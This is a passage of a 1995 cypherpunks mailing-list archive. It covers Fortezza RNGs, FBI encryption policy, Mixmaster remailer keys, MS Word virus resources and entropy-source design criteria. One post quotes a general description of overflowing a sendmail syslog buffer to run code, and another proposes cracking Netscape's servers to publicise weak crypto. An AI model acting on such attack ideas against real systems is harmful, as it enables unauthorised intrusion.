14:27:01 PDT Subject: Fwd: Re: Project: a standard cell random number generator Message-ID: <920706973.5067212@va.arca.com> Jeff, Yes Fortezza cards can be instructed to produce a random number through one of its library calls (someday they'll have a real API). One of the diagnostic tools I had tested this function. What algorithm do they use? Haven't a clue. Sources say that the RNG implementation may vary from vendor to vendor (i.e., GTC, Spyrus, Mykotronix, etc.). Daven ---------------------------------------------------------------------- Arca Systems, Inc. Leaders in Security Integration ---------------------------------------------------------------------- From samman-ben at CS.YALE.EDU Fri Sep 22 14:59:38 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Fri, 22 Sep 95 14:59:38 PDT Subject: ip: Freeh: Kiddie Porn was Encrypted (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- From: sobel at epic.org (David L. Sobel) In an address at the International Cryptography Institute conference in Washington today, FBI Director Louis Freeh revealed that the Bureau encountered encrypted material during the course of its "Innocent Images" investigation. That operation recently led to dozens of nationwide arrests for alleged trafficking in child pornography via America Online. Freeh also disclosed that encrypted files were found during the course of a terrorism investigation in the Philippines involving an alleged plot to bomb a U.S. airliner and assassinate Pope John Paul II. The FBI Director characterized encryption as a "public safety" issue and stated that the FBI and law enforcement agencies around the world "will not tolerate" a situation in which the wide availability of encryption may impede those agencies' "public safety functions." While noting that the current U.S. government policy is to encourage the "voluntary" adoption of key-escrowed encryption techniques, Freeh raised the specter of a mandated "solution." Freeh stressed that the FBI "prefers" a "voluntary approach," but likened the encryption issue to last year's Digital Telephony debate, where the FBI first attempted to achieve voluntary compliance but eventually sought and obtained a legislative mandate to assure law enforcement access to digital communications. Freeh indicated that "if consensus is impossible" on the encryption issue, the FBI "may consider other approaches." Following his prepared address, Freeh was asked why the FBI needs key-escrow when it has apparently been successful in decrypting information encountered in the cited investigations. His response to this question was somewhat vague, leaving unanswered the question of whether or not the Bureau was, in fact, able to decrypt the encrypted files seized in the "Innocent Images" investigation. More information on this point is likely to emerge as these cases come to trial. Davis Sobel Legal Counsel Electronic Privacy Information Center http://www.epic.org -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMGMxs75ALmeTVXAJAQE+8gL/SYfKkwRCROh5jPW/WmhHfpjze4u1W32H iA7jwFUilD1kawEzngqtmQoTwjYnpD8ShwDIIgmYnCNMwf4wYdm8FNZGvzenj/jx 8a20Xhw/aqLRL/qum/gMHTnhlEMTMlha =4U03 -----END PGP SIGNATURE----- From elkins at zzyzx.aero.org Fri Sep 22 16:01:15 1995 From: elkins at zzyzx.aero.org (Michael Elkins) Date: Fri, 22 Sep 95 16:01:15 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509222051.NAA10687@ix.ix.netcom.com> Message-ID: <95Sep22.160107pdt.111128-3@aero.org> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From bret at bjohns.win.net Fri Sep 22 16:27:39 1995 From: bret at bjohns.win.net (Bret A. Johnson) Date: Fri, 22 Sep 95 16:27:39 PDT Subject: Netscape to end Linux support? Message-ID: <1871@bjohns.win.net> What? Who can i call at Netscape? I have not gotten a recent version to work with 1.2.8.. >> >> And the sad part is that now that they have announced that they are >> dropping their unofficial Linux support, I really want to hurt >> Netscape badly. >> >> Sigh. >> >Anyone got a pointer to this announcement? > >Damn! Just when I was starting to like them ... > >-- >Jeff Simmons jsimmons at goblin.punk.net > From perry at alpha.jpunix.com Fri Sep 22 16:35:43 1995 From: perry at alpha.jpunix.com (John Perry) Date: Fri, 22 Sep 95 16:35:43 PDT Subject: 2 new MixMasters Message-ID: <199509222335.SAA08173@alpha.jpunix.com> -----BEGIN PGP SIGNED MESSAGE----- Hello Everyone! There are two new type-II remailers that just started in operation today. These are type-II only remailers. There is no type-I support. I vouch for these two remailers as I know the individuals running them personally. Below are the public keys for these sites. As a matter of fact, here is the type2.list and pubring.mix that mixmaster at vishnu.alias.net uses. John Perry - KG5RG - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome! WWW - http://www.jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers. type2.list: vishnu mixmaster at vishnu.alias.net bb460f08811a98682def423d30852d11 2.0 spook remailer at spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0 mix mixmaster at obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1 crown mixmaster at kether.alias.net 409deae815e07f4c40188de1148c1499 2.0b11 knight mixmaster at aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0 robomix robo at c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11 hroller hroller at c2.org 0b7e31bbfbb0159eea07144ab15b45f3 2.0b11 syrinx syrinx at c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11 rebma mixer at rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11 replay remailer at replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11 hacktic remailer at utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11 crynwr remailer at crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11 flame remailer at flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11 gondolin mixmaster at gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1 q q at c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1 Armadillo remailer at armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1 precipice mixmaster at mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1 anon mixmaster at anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b secrets secret at secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b pubring.mix mix mixmaster at obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1 - -----Begin Mix Key----- db91418edac3a4d7329feaee0b79c74f 258 AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8 d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd 2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- vishnu mixmaster at vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11 - -----Begin Mix Key----- bb460f08811a98682def423d30852d11 258 AAShg2h4xGHueryUFNsFBbtSGZBcj+oDImFMkOZA EQPcbeG6ReEnTnoQ8HBgwtx9isMT9hZ93lBaRY07 ygupHQRi6f+FnlQEZTKqOe+8E+WyDx+ox/1ywgt+ KGFOW+t8WRXA/loKuqD0KH4pwpe7FYE0arGbtm4J EscGM2DE3TeS3QAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- kethermix mixmaster at kether.alias.net 409deae815e07f4c40188de1148c1499 2.0b11 - -----Begin Mix Key----- 409deae815e07f4c40188de1148c1499 258 AASySwFrEZJjUxIPXamqGuKDf3/4TnsOv9dhvs5r FgVY2MxR7K497jLRwYBPlp8z5JrX21WMbMCBXS2x 8gD2kttZwD5uA05AjujxZzIYA69O2FfRuJ4CKRWW tdqlzZBXrwzFmMQm45ZocMm6cz+iR373qbgimRgo U4O0GT7CL6DxtwAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- knight mixmaster at aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0 - -----Begin Mix Key----- 6bb0d89a29fd188c67b8e04516b5af33 258 AATOSyg7N2PVg9VgA8voDWglq6ESNBLqH0heB2iE NfvmR/VnyAHCb4ZBtHzvM7ZRBdXYmH/Jt490wg6O ZCbhcIceFKSsibLEH77+111isAhUbHvn0Nh9gOI7 5ngjOGDQaLQvGUbNHRXQaPAZ0rc4lv9gmChJONOJ 7sFC2J96QR4aewAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- hroller hroller at c2.org 0b7e31bbfbb0159eea07144ab15b45f3 2.0b11 - -----Begin Mix Key----- 0b7e31bbfbb0159eea07144ab15b45f3 258 AAS+WXQ5iseHl1nf+gSXmIZbIScPI2Py9e+o+UCY FQT86f/cKyblwb/SY5v4A3pykyxTDC/T+f416Lel A7PhZfvSix/yM73f2yUCaFt7w9vFNmf4Y+5h/FWJ fNj0wwmy5foWIhlDkI3ue1uy4GZ18H5s43bs5qyz 3wDtH8C5wEbpJwAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- robomix robo at c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11 - -----Begin Mix Key----- 3d523f1fd30b5a1c57214960a00f1c4e 258 AATQ2zxiRZ5bQuNBKHEvg11R7L69Hc9ZrjTon3o3 s7fbXmuEaiym48sHoRLAttZ3ADuH1FgbuYt1DF+L Il9Yp5U9znm9MX0rS8xq1iGg7YDED/3x6OWIp7za 17+pWnYmEF+Rz6YZ2o/67ujcBfrJ/odz+SVlaGqF rWWjaG/oWdqWWwAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- syrinx syrinx at c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11 - -----Begin Mix Key----- 6c4e7372e84d7092e0d0e69c20d5be46 258 AATKhnhAIHXRCKZAi2tehJfQ9s+IsVPjEQQk5xwQ 60VXzmgkC2YirmDFeLz1feNgCMd78GkKHYK5p9WM HBkPNTDPLraJhJLNDHeHqGtqAI4BTHq/lZ/RMyOH GV/X5TaUEG69IGb2Rl8OnzNWF9fhKwH6PTE+QiQX kIcxJnVW+yYOpwAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- rebma mixer at rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11 - -----Begin Mix Key----- e7d84921298b0aadaf8f050d145ccf03 258 AASjOGqzTLdjweTMiwirrpVNqXj/ODJVyh9pEo5i q5ERILOd1hMNKY9XLNFYM30mUR/Fkh0MnYI/ujWz OTb0rR2a31nvmaLMdaB75nTdGJwHitCmo8k2eTjL XQsXV6zKrzXGp8H8NO34DAFWJy1qVcev+6lLAWGy j/fsJJyJNtl94wAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- replay remailer at replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11 - -----Begin Mix Key----- e3e2b4d67314b6165ee03b0b0ae07a7f 258 AATZBfJhv+DGg4OEfQfgVnzZZpumEZHI9CES+Ux2 dBp9RBPpJnAtLpcAyCIkNjSaik0togcKhFgcR3nt XIrWclJ/uO/Z1fqW7ESLwzXozCpqnG5S/y6mUPuL yzA9bqtAGd+pvxuK/Cw2Zzx+1QGp0VtWb46KxqvC S4POHYFljkrQiQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- hacktic remailer at utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11 - -----Begin Mix Key----- bf61835a7b3cfa59c409caeab4e8a222 258 AATkwgy72zwwavCHn1OytNMsBYAIBnCFa2hcbZPi IN6eS4jDgFdld5DlcqqzdN6Lxv96i0Dg7ElFyAFR 5zmof3oaNqh5vbq/fTEbvFtX9EGyuqkfN6fKoAEv G7gtmkfosoIg/jnI8AL9KC/J5mGaxrWYB6XBe+v9 iI1pOSbPsDCsdQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- crynwr remailer at crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11 - -----Begin Mix Key----- 64c62de6b347b3050fbb6e94c649112d 258 AATLe0CWPSn844FCeL7FzUlf+vE2qfYBPs/8PYYm BfITjknJjD0dk7vXhX9Qc5PFgDWRHhVoIRlFT3sc Jp2UVFLOZ5zn/WiT9Wa1tZsqejDf3MRIDT/K6cHB uB/SUaxLzNfk/wG1uBTUHukdjwCyDxNLHuYA5mVz opYJhQR0Nc/ESQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- spook remailer at spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0 - -----Begin Mix Key----- ca8c8679f7b1cbdcff46d780fba97673 258 AATZXVb4yP3MGt/ZCR5FtrHPMgYNyXHBmnG8KWO0 UaT5jbMqBdRQEzOVrCN/5RXerpS8Hctbc5MrwhSr fh/byQLwLkY50zYAxWSRBpaAJgZtCnQtVTgmt9yu BDiCE2OasFnZlwsi+9t8+c5R2bS3C6UhjQsgybbF Aw7xWK3v3fPJqQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- flame remailer at flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11 - -----Begin Mix Key----- 64bbf500097b541a8ddcb2dd80373238 258 AAS5NFs7yPSFv+WwpO26/2OS7CYJDtrhlrEasf8S jJ9P0jqWXuorDIMKT3YfvSkk2xKqAHiHrOFEqltY plIUCoXyAf/7CmNyPYdTN6xNxO74ZIsTQnNgAJT3 6a8+JL92DZJM6pYfhpSvPq7lj5X0h6Hj/oCAlqiS 31TZJkd2jenjDQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- gondolin mixmaster at gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1 - -----Begin Mix Key----- 1d767b08fefa0a79d508be73e472d326 258 AATAwVkC3FI6NDi0GJvH+FBIK6MYVHvXofEoKMTc u7P1rI7yCW00JOF71k373wyepZDksw9wjZdrHZAB uyN7SICMaKPRvMA4rseZFjefzYaoFf5tO0OqFgcQ /pMOPDwYl0nHyuLJvqjpADMDtatQaN2+/T/HtcMX Q1KCcLk24jEWbQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- q q at c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1 - -----Begin Mix Key----- c44e1cb0f0709465c21b07ac972bf973 258 AATDBaiKBy4jPlRUIQmVvcjO/GhWLbsls+mKloml 5EScYl+3fGw04P4xVcWOSledFVxKVfNy+xTVI8pE XGXSr0cRUIa1NttzNPk/KObb5SvkeqGtWAyRiWBS G91MkWM6LbqzKPcu6gUON47wJCJCzdvgbUIeVJIT MnyBvMWJX5CKAwAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- Armadillo remailer at armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1 - -----Begin Mix Key----- 7251877ae6fed509ebf7567715974d1b 258 AASWRIpH97WDVCNc/kiLqvmxqwN9cAAbZFi+FIwr gCixQRTtD/SXuXd62iIqRMp3xm4c+uSnTzLijIxi fCYLacNMVeh0PXAszfFIh6CBicPq1UWt82Wu5dqw K/goNULqNDUypGQtOfOpHSQKPwAphXplKhv75OZs SjtMoEcv0CCk3wAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- precipice mixmaster at mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1 - -----Begin Mix Key----- 05fef5887ac55dfe7379d0ef4a2a0c4b 258 AATIdI/+dQ3rsvREcdYsnJkd+zQKCkPerZsyDXmX NaYjUTwMhiHHjl/e7Zqx/mUAUQnifQfg4KpHvBGL a6rQUTQjRhhz8sOvynyJci4NTm8DFDjYdTpvnbjp YPu7xNhSfg7fmqXuqCan1M/AmpU1r6sF6M6gA0W4 EpOqFaJo7g32xQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB - -----End Mix Key----- secrets secret at secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b - -----Begin Mix Key----- bc2e4251dbddfa74dfae8b274904c2be 258 AATBBbpmFw7omad8hpvxQiylmoi5MBXs5SivpcY6 65jnhZIiL9HvTE+Rq+30STccDsQWze0/iZthg1RL tCXYtABwkfsHOf60/aq1aOBobkquzBItvzQMG0W/ TkVinZYUTqfdytl/pfLDIQiXv7Z0t98MrLsmVopE 1NQS7sH6g9srFwAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB anon mixmaster at anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b - -----Begin Mix Key----- e3ca4cc5beb9934ae6d52dd27da80332 258 AATZuNYrX4bw6A01PA00qMr7KeJsnHIq9wYoSc5P OrHUEvPUoCxmLfuhwF9eEfSkV4t9DLPIMhKXM4iL Afhv2IZKeWaA98q4NHb6E7Gg6/e6uCI1O3nmXXK8 la4ij9RneCHig5K6JlCh3MJTkuW/IEYQjMrz2/H5 RUDEwx+/HL5K0QAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMGNIN6ghiWHnUu4JAQEeJgf8CWZIoe/3Z7RMXBcdIHsVYnkRcd0BWLIE Wqt/SaIKTjqBP7wP+vdiPOkpQXpwfVCw70DS6T46xDq0Y045caaaj2AhoQ1ObPPy ifVTBLI7bctvR0R2/3fUitT3iJdK1u5LHMrbmTneOWo1DHpIDts0fH/EeHTNUVQ9 MrOqu5dQNOBLWpcG7zqQ66ffmxMXVnht7jF+mugbK668/5l3WyyHl8ZYrzojeEBx ROmKOsp4Ij2YD1tZINAFXGtFo71hj3MFY8QT+sgUKjPDsmvIYi6XxCrP98I5SzMG bM2q2gNf4hhLhtWoRu+jwK1BEEM+pf3M9UNug8kvqH90eAk26j79+A== =B/n/ -----END PGP SIGNATURE----- From anonymous at freezone.remailer Fri Sep 22 16:47:15 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Fri, 22 Sep 95 16:47:15 PDT Subject: MS Word Virus Message-ID: <199509222347.TAA00888@light.lightlink.com> For info and helpful links on the MS Word macro virus, see: URL: http://csrc.ncsl.nist.gov/first/resources/word.html --------- Information on the Microsoft Word Virus Reports Comments welcomed: first-sec at first.org This page contains links to information and related utilities for the Microsoft Word Macro Virus. The links and text on this page were mostly donated by a fellow FIRST member. The FIRST Secretariat would like to express its appreciation to this member and others who have contributed information. Microsoft's Writeup Microsoft has a writeup on the virus-like macro and has a scanning tool to remove the problem. Macintosh advisory DataFellows Web page DataFellows (the people who produce FProt) has an excellent informational web page, including images of what you would see if you had the virus. Also, you can download DataFellows' utility, which works on both PC's and Macintoshes. Download DataFellows Utility IBM Writeup An excellent write up by IBM. NCSA page The National Computer Security Assiciation has a page which contains images of what you'd see if you had the virus. S&S Writeup A writeup by S&S, the makers of Dr. Solomon's Antivirus Toolkit Sophos Plc A page written by Sophos Plc. AVP Page Eugene Kaspersky of the AVP Computer Virus Research Lab, wrote this excellent web page on the virus. Dave Phillips Information page. A page written by Dave Phillips. NH&A A page consisting of an announcement and email traffic, written by NH&A. Datawatch Virus Definition Update Datawatch, (Virex), present a virus definition update to their product to find this virus on Macintoshes. From tomw at orac.engr.sgi.com Fri Sep 22 17:04:54 1995 From: tomw at orac.engr.sgi.com (Tom Weinstein) Date: Fri, 22 Sep 95 17:04:54 PDT Subject: netscape bug Message-ID: <199509230003.RAA06024@orac.engr.sgi.com> In article , "Perry E. Metzger" writes: > I can tell you in general terms -- I don't write MIPS assembler > myself. However, I will point out to you that you use an ancient > Sendmail, and that it uses syslog(3) on user produced data, and that > syslog uses a static buffer. Trick sendmail into logging something > very big, and you can do what you like. The 8lgm people wrote a demo > for Sparc as a proof of concept. Hmm, after having looked at the syslogd code, it looks like this particular bug has been fixed for at least several years. However, there sure are a hell of a lot of fixed size buffers being alocated off the stack and some of them are being used in unsafe ways. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at engr.sgi.com From anon-remailer at utopia.hacktic.nl Fri Sep 22 17:32:50 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Fri, 22 Sep 95 17:32:50 PDT Subject: test Message-ID: <199509230032.CAA28999@utopia.hacktic.nl> -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From liberty at gate.net Fri Sep 22 17:37:47 1995 From: liberty at gate.net (Jim Ray) Date: Fri, 22 Sep 95 17:37:47 PDT Subject: The Next Hack Message-ID: <199509230033.UAA37480@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Al writes: >Maybe a good tactic would be to crack a "secure" server, and send the results >ONLY to the server operators, along with a description of machine-time involved. > >Put out a public press release, describing the machine-time involved, how it was >possible due to weak crypto imposed by the government, and the possible >economic and commercial implications of said weak crypto. > I'm with Lucky, let's go after Netscape itself. They deserve it more than their customers do, and they would then have a strong motivation to fix it. The press release would then *only* involve Netscape, and maybe a few C-punks could buy a few Netscape puts ;) and donate the bucks made for something like Tim's stable remailer. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMGNU321lp8bpvW01AQEtBQP7BdcB2W5bkCel56eUkZVSkPxJv4hPZren 3P/QtZAAVyF8Xt8692m4lPLVMqtgKqkrtzoqVg7zi/56tqwnLmUcv+TnqSxNdctb H7durUUVgK+yqsz2Jd8pc0dPBFzT5c1IeZFjVmhG4+ChjzeAnd8WRoqy8BYfHr+w 5s8Tk2XlJF0= =6CRC -----END PGP SIGNATURE----- Regards, Jim Ray "People are deceived in masses, but enlightened one at a time." -- Dick Boddie. ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James Milton Ray ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf _______________________________________________________________________ From tcmay at got.net Fri Sep 22 17:39:00 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 22 Sep 95 17:39:00 PDT Subject: Netscape sub rosa? Message-ID: At 10:30 AM 9/21/95, Matthias Jordan wrote: >Hello, Tim! > >> Gee, where's that "Cypherpunks logo" when you really need it? >> >> A rose covering the Netscape "N" logo? A crypto eagle swooping down and >> pecking at weak keys? > >How about an anarchism-A (an A in i circle) whith the circle not >being totally closed thus describing a C? That was actually done by someone in Monte Carlo when I was giving a talk on crypto anarchy. Somebody drew in this anarchy-in-a-C on an announcement of my talk. I still have this. ObCypherpunks Relevance: This is "coding in C," isn't it? --Tim May BTW, to set the record straight, my "Gee, where's that "Cypherpunks logo" when your really need it?" was tongue-in-cheek (a kind of irony, for you foreigners). Notice: Don't expect me to reply to trivial questions and complaints. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From dvw at hamachi.epr.com Fri Sep 22 17:50:33 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Fri, 22 Sep 95 17:50:33 PDT Subject: RNG Resource FAQ (was Re: "random" number seeds vs. Netscape) Message-ID: <30635951@hamachi> Perry Metzger writes: # You might want to read RFC 1750, Phil Karlton writes: > Did that. It talks about a lot of the pitfalls. Unfortunately it does not > address (nor can it realistically be expected to address) details of what > to look for on a particular version of an OS running on some particular > platform. Can someone point me to a compilation of such information ? If not, I'm definitely interested in starting a Web page to chronicle recommendations about good, bad, and questionable random and pseudo-random sources for specific architectures and operating systems. (It could also include information on special-purpose plug-in hardware RNGs.) -Futplex Having overcome my initial skepticism on the entire topic of entropy, based on the useful pointers to the literature I have received, I agree wholeheartedly with the need for _positive_ design criteria against which designs may be evaluated. For initial consideration, I recommend the following: The entropy E is defined by the sum across n states of -P_i log_2(P_i), where i ranges from 1 to n, and P_i is the probability of state i. In order for this expression to have meaning, the all four criteria of the following must be met: 1) The states exist and can be identified. 2) The number of states n is known. 3) The index value i uniquely identifies a state. 4) The function P_i is known and well-behaved. The designer should disprove the negative of each of these to arrive at a _concise_ statement of their "proof" of measured entropy equating to predicted entropy. For example, the designer should "disprove" the statements: "The states do not exist. Even if the states exist, they cannot be identified." by clearly stating the factors that lead to the existence of the states, and precisely why they can be identified. This provides a list of requirements (in effect) for a deployment to meet the expected entropy. I think that application of these criteria can rigorously explain the difficulties in using mouse movements, for example, as a source of entropy. In addition, the problems with clocks in PC emulations on Macs also speak to these criteria. Certainly the entropy available from pid is also explained here in a rigorous way. I would appreciate feedback on this as a foundation for a set of _positive_ design criteria for sources of entropy. If I have missed information in the literature that provides design guidance (not anecdotal pitfalls, which are very valuable but lack rigor in the cases I have seen), I would very much appreciate that as well. A 